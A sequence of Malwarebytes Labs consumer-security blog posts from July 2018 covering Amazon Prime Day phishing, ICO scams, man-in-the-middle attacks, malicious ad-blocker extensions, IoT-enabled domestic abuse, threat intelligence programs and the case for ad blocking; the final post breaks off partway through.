Malware Bytes

A primer: How to stay safe on Amazon’s Prime Day Sale

Malware Bytes Security - Sun, 07/15/2018 - 1:34pm

Bank card—check!

Shopping list—check!

Lumbar back support pillow—check!

Noise canceling headphones—check!

And, of course, coffee—check!

If you’re an Amazon shopper, then you know by now that Prime Day is nigh!

And by that, we mean “tomorrow.”

If you’re one of the many who dreads bidding the weekend goodbye, this is probably the one Monday of the year you look forward to.

It’s true that Amazon Prime Day isn’t your regular Thanksgiving shopping event, but it has become so massive so quickly to warrant one unintended consequence: catching the attention of online threat actors.

A very big deal

Amazon launched Prime Day in 2015 during the company’s 20th anniversary. And they have been stepping up their game ever since. To date, Prime Day 2017 was hailed as the biggest shopping event in the company’s history, surpassing its 2016 Black Friday and Cyber Monday revenue.

Orders placed via mobile devices also spiked, thanks to the Amazon app that many users have downloaded and installed just for Prime Day. Of course, overall increased sales also translate to increased profits for small businesses around the world. In case you’re not aware, a huge chunk of sellers on Amazon are small businesses.

It won’t be a surprise to expect that Prime Day 2018 would be bigger than last year, and Cybercriminals may be counting on this.

Your Amazon Prime Day security reminder list: Do’s and don’ts

Regular readers of the Malwarebytes Labs blog know that Amazon has been used in several threat campaigns to target users. In 2015 – 2016, we’ve documented some spam emails that circulated the web bearing the Amazon logo, and their ruses ranged from requesting users to confirm their accounts information, to filling in a survey in exchange for a small fortune, and redeeming a soon-to-be-expired $100 Amazon Prime credit.

Then in 2017, Mark Jones (writing for Kim Komando) reported about a phishing email that Kim herself received almost a month after Prime Day ended. The email offers recipients a $50 voucher as a bonus for reviewing a product they recently bought on Prime Day, according to the post. Clicking the link in the email body redirects to a fake Amazon login page.

More fake Amazon emails could materialize from hereon. But these shouldn’t get in the way of someone using or trying out Amazon’s services for the first time—or any e-commerce site’s, for that matter. These sites not only afford us the ease and comfort to shop while remaining in bed and in our pajamas, but they also have selections we cannot otherwise find in brick and mortar shops in town.

If you enjoy shopping on Amazon, protect yourself by protecting your account credentials and shopping transactions. Below is a list of do’s and don’ts you should keep handy alongside your shopping list.


…download only the legitimate Amazon app from the Google Play and Apple App stores, which you can find here and here, respectively. In doing so, you’ll avoid getting confused as to which app to install—as there are variants of them—and what to trust—as there may be impersonators. Threat actors targeting users on mobile devices have become craftier with their tactics, their latest being the use of Unicode, allowing fake apps banking on famous names to pass through security scans.



Read: Phony WhatsApp used Unicode to slip under Google’s radar

…setup two-factor authentication (if you haven’t already). This is for added security, of course. If you’re the type of shopper who takes their time, you may find it quite annoying to re-enter your creds and authentication number multiple times but having this enabled is so worth it.

…use your credit card when paying for purchases as much as you can. This is because credit cards are insured by the bank but not debit cards. Although a type of consumer protection called a chargeback is in place, it is not a legal protection. This means that your card provider may or may not award one a chargeback, depending on the case.

…look at emails purportedly originating from Amazon with a critical eye. It’s a prevention mechanism we should all be practicing when handling emails as doing so will save you a lot of headache and firefighting in the long run.

…familiarize yourself on how to report phishing emails and pages to Amazon. Why? Because fellow shoppers may not be quick enough to sport the fake email you just spotted. Amazon has a handy guide on walking users through the reporting process in this Help & Customer Service page.

…buy items from sellers you trust or are comfortable with. Like any other e-commerce site, Amazon has bad sellers, too. And by that, we mean those who (1) impersonate legitimate companies by stealing their brand and the showcase of products they sell, (2) purport to sell products but never ships them and attempt to run away with your money, or (3) sell you counterfeit or knock-off goods. If you don’t know which seller to trust, check out the third-party supplier’s Amazon page and see when the profile has been created. Usually, the scam ones are generally those that just launched and suddenly offers pages upon pages of a variety of cross-industry products, which are often just stolen random images from several real sellers. Also, watch out for third-party sellers with too-good-to-be-true glowing reviews as (1) they may have been auto-generated by bots or (2) they’re paid reviews designed to put sellers in a favorable light.


…reuse passwords. If the Amazon account password you’re using now is the same as your, say, Twitter password, it’s time to change that. You’re just making it easy for criminals to access two or more of your online accounts.

…enable macros. Amazon email has convinced you that it’s real. You open the attachment. It asks you to turn on macros. I think you should consider stopping at this point because doing what it tells you to could open two possible scenarios: one, nothing will happen; two, you just got your computer infected with malware. Think about this.

…fall for Amazon gift card scams. We rarely read about this, but it happens. Usually, questionable sellers would ask prospective buyers to pay for an item outside of Amazon in the form of gift cards. If a seller suddenly asks you this, disengage from the conversation and report them to Amazon immediately.

…use public Wi-Fi to shop. You’re only exposing yourself to MitM attacks. It’s better to shop at home or (we know you do this) at work during your break time.

If we make it a point to address our (potential) security issues first and make mental notes of the rest in our list, then Prime Day 2018 shouldn’t be that stressful. Perhaps.

So, what are you waiting for? Ready, set, shop!

Other posts related to Amazon you might be interested in reading:

The post A primer: How to stay safe on Amazon’s Prime Day Sale appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Block all or nothing to prevent ICO fraud?

Malware Bytes Security - Thu, 07/12/2018 - 1:00pm

At Malwarebytes, we feel we have reached a point where we need to ask our customers how to proceed on the subject of ICO scams. Asking for your opinion may seem strange to some of you, but Malwarebytes comes from a community of mutual help and trust. If you were unaware of this, reading how our CEO got involved in the anti-malware business is a good way to get acquainted with the cornerstones this company was built on.

To elaborate on what we need your help with, we will need to explain a bit of the background, so bear with us.

What is an ICO?

ICO is short for Initial Coin Offering, which is, in fact, a method of crowdfunding, used for many crypto-related projects. The founders of a new company offer shares of their own blockchain-product for sale in exchange for established crypto-currencies like Bitcoin, Ether, or Monero. With the funds they gather the capital to get their company up and running. Once the company is successful the “coins” bought by the investors will be worth more than what they bought them for.

That is how it should go, but what we see over and over is that the people that initiated the crowd-funding, grab the investments and are never to be heard from again. Or we will see them at a later time, under a different name, repeating the same procedure. Some of these imposters are using templates that they re-use for every fake ICO. These templates are for:

  • Creating an account at the Ethereum blockchain
  • The packet script for the blockchain
  • The sites to promote their new product
  • Advertising campaigns to get people to visit that site
  • Accounts on bitcoin-related forums to promote the ICO
  • The whitepapers explaining the goals and targets

To put this into perspective, it might also be good to mention that a recent study showed that only 8% of ICO’s managed to trade on an exchange. So, even if we only consider 80% of them to be a scam, the chances of investors losing their money are much bigger.

How to spot ICO’s that might be fraudulent?

There are a few methods you can use to decide for yourself whether an ICO is worth your hard earned money:

  • Do the people behind the ICO actually exist?
  • Does the plan they have make sense?
  • Is the earning model realistic?
  • Does the team behind the ICO answer questions about their plans?
  • How far are they in the development of their currency, do they have safe wallets etc.?
  • Do they stipulate that US participants need to be accredited investors?
The problem at hand

We have been seeing a lot of ICO’s that are nothing short of scams. And we would like to protect our customers against them. But, if we wait until we can prove that they are a scam, it’s probably too late and the crooks have run off with the investments. So we would need to be more pro-active.

Are we alone in this battle? We certainly are not.

What do we ask of you?

Please let us know in the comments section below this post whether you feel we should block ICO advertisements, all ICO related sites, or leave it up to our customers to decide for themselves.

Please take note that users of our Chrome or Firefox extensions may already see some of the sites being blocked. This is because the extensions are behavioral based and may have spotted a scam for you.

If your comment does not show up immediately, you may be able to find the reason in this post: Did my comment on your blog get lost?

The post Block all or nothing to prevent ICO fraud? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

When three isn’t a crowd: Man-in-the-Middle (MitM) attacks explained

Malware Bytes Security - Thu, 07/12/2018 - 12:42pm

Gone are the days when eavesdropping is just the stuff of spies and the town gossip. In fact, it has evolved to become everyone’s favorite pastime. Thanks to the internet, it is exponentially easier now more than ever to idle by and catch juicy information than to press your ear against your neighbor’s wall.

While we can easily forgive and forget listeners within earshot of our vicinity when we’re having conversations in public, digital eavesdropping, on the other hand, raises the privacy red flag to new heights. And this can quickly be done via taking advantage of two things: one, our penchant for connecting to Wi-Fi networks (whether they’re insecure or not, whether they’re for public use or private use); and two, the exploitation of that Wi-Fi network. Suffice to say, digital eavesdropping isn’t and shouldn’t be considered a pastime, especially if you have the skills and the means to do so.

And when it comes to eavesdropping online, the term that immediately comes to mind is man-in-the-middle, essentially a scenario wherein a third person places themselves in the middle of two parties communicating with each other. A third wheel, so to speak. However, this person or entity is unseen by the two parties. In fact, they don’t even know that they are in the company of a third wheel.

While we know that eavesdropping is generally a passive exercise—Person C takes the role of listener-observer, and not get involved with Person A and Person B while they chat—MitM attacks are anything but. On top of snooping, controlling the conversation is required; thus, contact with the targets is inevitable. This makes a MitM attack an active exercise. And such an interfering activity demands inventiveness, attention, patience, guile, and the willingness to be as deeply involved as needed to attain their goal.

MitM attacks could be aggressive, always surreptitious, and invasive.

Not to mention worrying and creepy. How can threat actors do this, and why even do it?

MitM attacks involve the unlawful tapping of a network to exploit transactions, conversations, and data transfers on-the-fly. Threat actors can do this by taking advantage of weaknesses of a network or of any of its elements like software (browser, VoIP, etc.).

Many organizations practice what are essentially MitM tactics—whether they claim they know of this or not—so they can monitor their employees. Some do it for advertising purposes, as in the case of Superfish, a piece of software that was pre-installed in Lenovo consumer products.

Governments are also known operators of MitM attacks to proactively spy on their citizens, circumvent security measures of technologies, spy on enemy countries to steal classified information, and steal money from financial institutions based on other countries to fund their projects.

Furthermore, we’ve seen MitM used in large part of the modus operandi of a criminal group to essentially steal from the clients of private European companies they targeted. They did this by infiltrating target networks to gain access to email accounts, monitoring payment requests from these companies, and then—putting themselves in the middle of the email conversation by impersonation—instructing clients to send payments to bank accounts the criminal group controls.

Read: How to encrypt your email

Okay, so, we have Wi-Fi eavesdropping and email hijacking as two types of MitM attacks. Are there others?

These are just two of the most common types. Others are:

  • ARP poisoning
  • DNS spoofing
  • Port stealing
  • STP mangling

Note that not all the types we mentioned can be done in all kinds of computer networks. For example, ARP poisoning can be done against systems connected via Ethernet in a LAN. However, this cannot be done when attacking remote systems.

There are also different ways a threat actor can perform MitM attacks, such as sniffing, injecting, hijacking, stripping, and filtering.

I’ve read somewhere that MitM comes in many forms. What are they?

There is an attack called man-in-the-browser (MitB), which starts when a piece of malware arrives on user systems, runs when the browser runs and then does its magic by modifying banking transactions behind the scenes while maintaining the appearance of legitimacy to the unknowing user. That said, one can deduce that MitB attacks are made for financial fraud.

MitB attacks are particularly dangerous to users and tricky to spot because criminals can siphon off money even though security controls, mechanisms, and encryption are present on the bank website, and the user’s antivirus program is working normally.

Then there’s a type used against mobile devices called man-in-the-mobile (MitMo). This is also known as man-in-the-phone. Like, MitB, this is also malware, and its purpose is to specifically circumvent SMS two-factor authentication. It does this by monitoring incoming messages with transaction authentication numbers (TAN) and other verification codes sent over to users via SMS. Android users are mainly targeted by MitMo malware like SpyEye and ZeuS. CatchApp, an app capable of stealing encrypted chat messages from WhatsApp, is another example of software that can perform MitM attacks on mobile devices.

Still, in the realm of mobiles, we now have the relatively new type called man-in-the-app, wherein an attacker can use a self-signed certificate to communicate directly with a compromised app.

Then we have MitM for the cloud called the Internet of Things, appropriately called man-in-the-cloud and man-in-the-IoT, respectively.

Are MitM attacks still happening?

Yes. They’re quite prevalent, actually. Some types of MitM attacks are easy to do, and there are readily available hacking tools a budding threat actor can use to set up an attack. It’s even possible (if not highly likely) for insider threats in a company to conduct such attacks within the organization’s intranet.

Unfortunately, detecting most of the MitM attack types are difficult. Therefore, nipping such attacks in the bud by prevention is still very important. And preventive measures to counter this type of attack also enhance a network’s security and privacy.

Since prevention is better than cure in this case, what are the ways to protect me from MitM attacks?
  • Avoid using public Wi-Fi networks, if you can, especially if they are not password-protected. If you do use secure Wi-Fi, limit your use to browsing, reading, and other activities that wouldn’t involve you entering your credentials.
  • Like we always say, log out of secured sessions whenever you’re not using them. Majority of social networks do this automatically the moment you kill the browser or close its tab, but it still pays to log out manually for others.
  • If possible, access only websites sporting the green lock or those using the HTTPS protocol. Also, if you can use apps or extensions, such as HTTPS Everywhere, to force the browser to visit the secured versions of websites you visit, then install them.
  • Apply multiple authentications to accounts if this option is available.
  • If possible, install and use a virtual private network (VPN) when conducting your sensitive transactions and communications online, or if you absolutely feel the need to use a public Wi-Fi connection.
  • Look out for potential phishing emails asking you to update your passwords. In line with this, also be wary of emails carrying attachment, which could be a malware that could expose you to MitM attacks.
  • Make sure that your home router is configured securely as well. You can do this by changing the default router username and password to a unique and strong one.

Additional reading:

The post When three isn’t a crowd: Man-in-the-Middle (MitM) attacks explained appeared first on Malwarebytes Labs.

Categories: Malware Bytes

We block shady ad blockers

Malware Bytes Security - Wed, 07/11/2018 - 2:15pm

Some of you have reached out to us concerning Malwarebytes blocking of certain ad blocking extensions, or an influx in web blocking notifications. First things first, this is not a False Positive. Recently in their blog, AdGuard discovered that numerous malicious ad blocking extensions were found in the Google Chrome store. According to an article by ZDNet, the malicious extensions have since been removed from the store, however, 20 million devices are estimated to have downloaded these apps while they were still online, you might own one of those devices.

The extensions are used to basically turn the browser into a zombie under the control of a remote attacker, essentially adding your device to a Botnet. Since we are limited in our ability to remove extensions completely, we are blocking the domains the malicious extensions reach out to, so at the very least, users will not have their systems controlled by cybercriminal.

If you are getting pop-ups like the above, consistently, you may be running one of the malicious extensions. Here is a full list:

  • AdRemover for Google Chrome
  • uBlock Plus
  • Adblock Pro
  • HD for YouTube
  • Webutation

If so, your best option is to remove it from your browser.

Check out our guide on Adware, that includes a section on extension removal.

Take a look at the names of some of these “extensions” notice anything? Adblock Pro, uBlock, YouTube, all big names and buzzwords that make these extensions seem more legitimate, add in the fact that fake comments and reviews are created all the time for these types of tools & at the end of the day, the criminal is counting on your ability to not realize ‘this is not the app you are looking for’.

Please be mindful of what you install in your browser and overall on your computer, just like those cheap DVDs you might find at the shop, who have titles so incredibly similar to a big blockbuster film, that folks who aren’t as familiar with the source material overlook the fact that they are buying a knock-off. Think of this the same way with extensions and plugins and add-ons for your browsers, there are some really great ones out there, but there are a LOT of shady copycats.

Be sure to check user reviews, download numbers and even outside recommendations (searching for “best ad blocker” might be a good place to start). This is going to make sure you’ve installed the right tool that will do the best job.

Thanks for reading, safe surfing, see you next time!

The post We block shady ad blockers appeared first on Malwarebytes Labs.

Categories: Malware Bytes

IoT domestic abuse: What can we do to stop it?

Malware Bytes Security - Wed, 07/11/2018 - 11:00am

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There’s been endless works of fiction where smart technology micromanaging the home environment have gone rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look how we got here by casting our eye back about 15 years ago.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech,  and they proceed to mess with their lives remotely. One is a somewhat more straightforward to approach than the other, but neither are particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPs is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs and then you’re back to square one.

With IoT, everything is considerably much more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice—frankly people tend to become aware if a physical device isn’t acting how it should a lot faster than their covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There’s so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, which is keeping at least one compromised device running to make the abuser think all is well is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

So you’ve been asked to start a threat intel program

Malware Bytes Security - Tue, 07/10/2018 - 11:00am

Ever since the Mandiant APT1 report landed like a bomb in private sector security reporting, threat intelligence has been a hot buzzword many companies have been chasing over.  But what is threat intelligence?  What do you need to execute it well?  And how many new tools do you need to buy?  The ambiguity around these questions leaves many people wondering “How on earth do I start a threat intel program?”

Maybe don’t?

Threat intelligence is a very new, very popular buzzword in the security industry.  But as a capability, it’s both very expensive, and meant to sit on top of a mature security program.  Do you have mitigations in place against the OWASP top 10?  Have you vetted your existing vendors for efficacy?  Do you have a fully staffed and trained SOC, or are your analysts working double shifts?  If you don’t have clear answers to those questions, your security program probably is not mature, and would not really benefit from an additional costly function.

Cost can be a serious concern.  While SOC analysts have a fairly wide spread for salary range, threat intelligence analysts with government training are not that common, resulting in a salary premium.  Below you can see a relatively common private sector intelligence analyst salary as contrasted with a salary for a government trained analyst.

Glassdoor threat intel salaries for the private and public sector

A well trained threat intel analyst embedded in a mature security team can be an outstanding force multiplier, but without a well oiled environment to place them into, they can inflate staffing budgets without providing a significant return on investment.

But I have to

If you must start a threat intel program, the first step is to look for the components you already have.  Spending on threat intel vendors or employees with highly specific experience can lead to astronomical costs, and raises the odds that enterprise leadership won’t find value in the team.  So start small: almost every Tier II SOC has senior members with a wealth of experience in the threat landscape, and an itch for more responsibility. Rather than casting a line into a very tight market for new staff, it’s much more cost effective to send those SOC members to intelligence training, then task them with creating training for everyone else.  Some companies have accomplished this via transitioning SOC staff from monitoring to threat hunting.

Threat hunting – intel you should already be doing

Per Wikipedia, “Cyber threat hunting is the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.”  In practice, what this amounts to is training analysts to tell the entire story of a threat: where did it start, what TTPs were employed in the attack, what systems were touched, and what corroborating information can be gained from public data.  When a responder is trained to tell the full story of a threat in this manner, organizations can not only respond to a threat, but can also learn from it and adjust mitigations accordingly.

Tools you need and tools you don’t

First and foremost, you do not need a third party threat intelligence feed.  It’s a nice to have, but the reality is that external vendors cannot provide data specific to your company, and frequently struggle to offer relevant data filtered by industry vertical.  Vastly more important is to make appropriate use of the data you have.  Here’s a non comprehensive list of data that many companies collect, but don’t exploit effectively:

  • Malicious spam can be used to pinpoint types of threats specific to the organization, as well as relative popularity of exploits used
  • Log review is commonly done as part of after action reports associated with a breach.  But they can also be used proactively to review patterns of activity, and adjust mitigations accordingly.
  • Password failures.  If a threat actor is attempting to brute force an account, is it a dictionary attack or have the credentials previously been valid on the system?  Looking at use of outdated passwords can pinpoint a past data leak, or give visibility into how stolen company data is disseminated out to threat actors.

Reviewing internal data for threat intelligence can be much more effective than a third party feed because all internal data is by definition tailored to your company’s specific threat profile.  It also costs nothing, which doesn’t hurt.

Where to go next

Threat intelligence is a relatively new field in private sector infosec, but a few researchers have produced valuable resources for getting people on the right path.

Securosis provides both a threat intel blog, and a library of papers offering deep dives into security principles and best practices.

The SANS reading room has a great white paper on identifying what threat intel is, and what it can do in best cases.  Very useful in communicating with executives who might be unclear on these ideas.

And if you’ve already started a threat intel program, check out the SANS paper on evaluating information security controls.  The scope is a bit broader than a single cyber security function, but should provide valuable input on how to judge if your program is working for you at a reasonable cost.

Threat intelligence is still a very new idea that doesn’t yet have widely agreed upon best practice.  So while there are some good resources to get started, the best resource for you is most likely other people in the same position.  Talking to peers, reading current blogs, and keeping tabs on productive teams can position you well for success.  Good luck, and stay safe.




The post So you’ve been asked to start a threat intel program appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (July 2 – July 8)

Malware Bytes Security - Mon, 07/09/2018 - 1:00pm

Last week, we tracked back a large mining operation from their Coinhive shortlink, we took a look at online project management tools, we described a new macro-less technique to distribute malware, and talked about a Mac malware that targets crypto-mining users.

Other news:
  • Huawei enterprise comms kit has a TLS crypto bug. (Source: The Register)
  • The Pentagon is building a dream team of tech-savvy soldiers. (Source: Wired)
  • Some computer science academics ran an experiment to find out whether your phone is secretly listening to you. (Source: Gizmodo)
  • Chrome and Firefox pull stylish add-on after a report it logged browser history. (Source: Bleeping Computer)
  • A downloader that decides how to infect the victim: with a cryptor or with a miner. (Source: SecureList)
  • Macro-based malware campaign replaces desktop and Quick Launch shortcuts to install backdoor. (Source: SCMagazine)
  • Homeland Security subpoenas Twitter for data breach finder’s account. (Source: ZDNet)
  • Ex-NSO employee caught selling stolen phone hacking tool for $50 Million. (Source: The Hacker News)
  • A handful of giant companies are centralizing control of the internet. (Source: BuzzxFeed News)
  • Eight arrested in Africa-based cybercrime and business email compromise conspiracy. (Source:

Stay safe, everyone!

The post A week in security (July 2 – July 8) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Everybody and their mother is blocking ads, so why aren’t you?

Malware Bytes Security - Mon, 07/09/2018 - 11:00am

This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.

If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.

We’ll then follow-up in Part 2 of this series by discussing common tools and configurations to help get the most of your browsing experience.

You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.

Don’t be fooled. Ad blocking provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information. Not only that, but blocking online ads and trackers has the added benefit of conserving bandwidth and battery life, boosting website response times, and generally improving the overall user experience. So using an ad blocker not only protects your device, but also provides better a better overall user experience. What’s not to love?

It’s all a bunch of hullabaloo!

Advertisers, publishers, and website owners despise talk of blocking the pesky advertisements that appear on their webpages—especially the ads that more aggressively vie for attention (and thus pay the website owners’ bills). We’ve all seen them. We’re talking about the ads that auto-play commercials or news clips as soon as the page is loaded. Bright, flashy popups, and page overlays that have to be clicked before seeing the desired content. Even the sponsored results that appear in search listings.  They are everywhere!

Hundreds of billions of ad impressions occur each month, and digital ad revenue for online advertising is estimated to top $237 billion in 2018. With so many impressions to be served, it’s no wonder that website operators are clearing space and making way for advertisers to clutter the website landscape.

Search listing shown inside Google

And we get that ad impressions are the lifeblood of many website operators and publishers who rely on clicks as the primary mechanism to create revenue. Some may even argue that ‘clicks create jobs’.

But let’s face it. In most cases, ads suck! Advertisers like to push the notion of “acceptable ads,” “non-intrusive advertising,” and “reasonable number of impressions,” but this is rhetoric designed to sway the opinion of an impressionable society—and it’s all a bunch of poppycock if you ask me.

Most people don’t like advertisements. They never have. That’s why VCRs became popular back in the `80’s. The devices allowed users to set up recordings and then skip commercials at their convenience later. It’s why DVRs became mainstream years ago, and why people flock to streaming services like Netflix now. It’s even the reason why people skip the first few minutes of a movie.

Ads diminish the overall user experience by forcing the attention of the consumer elsewhere, and creating a delay or nuisance in the ability to ingest the preferred content. A website’s “sponsored” listings often consume much more of the page landscape than actual content, which causes more time to be spent searching for desired items. This can lead to consumers paying more than would have been paid with a non-sponsored competitor. And then there are the ads that are purposefully obnoxious or play reoccurring sounds in a small box in the corner of the window. These are all just terrible to endure.

If it were a matter of simply not enjoying the content, then this point would be debatable. But, online advertisements pose a threat and provide an infection vector for malicious actors to launch targeted malware attacks. This can turn even the most reputable websites into potential delivery systems for malware authors.

Malware can be delivered inside that ad

Advertisements allow for fun little flashy ads that can play games and ask quizzes, but at the same time this functionality poses great risk to consumers.

Malvertising has the ability to affect even the most careful of users due to the nature of how advertisements are designed to automatically run code when they are loaded. Attackers may (and do) attach craftily hidden exploit code to otherwise innocuous looking ads for well-known products and then submit these ads for publication to known and reputable websites.

Don’t be fooled by this Best Buy ad. It’s not real!

While many of the large ad networks perform due diligence and scan for such malicious content prior to publication, there are dozens, if not hundreds of ad networks to which a criminal can submit their malicious code. And not all of those companies possess the same standards as their multi-billion dollar counterparts. Taking into account the speed and nature of the real-time bidding process for online ads (a fascinating process that deserves a post unto its own) it’s not surprising that bad ads can get past even the most well-intentioned ad networks.

$5.00 and 10 minutes is all it takes with this ad network.

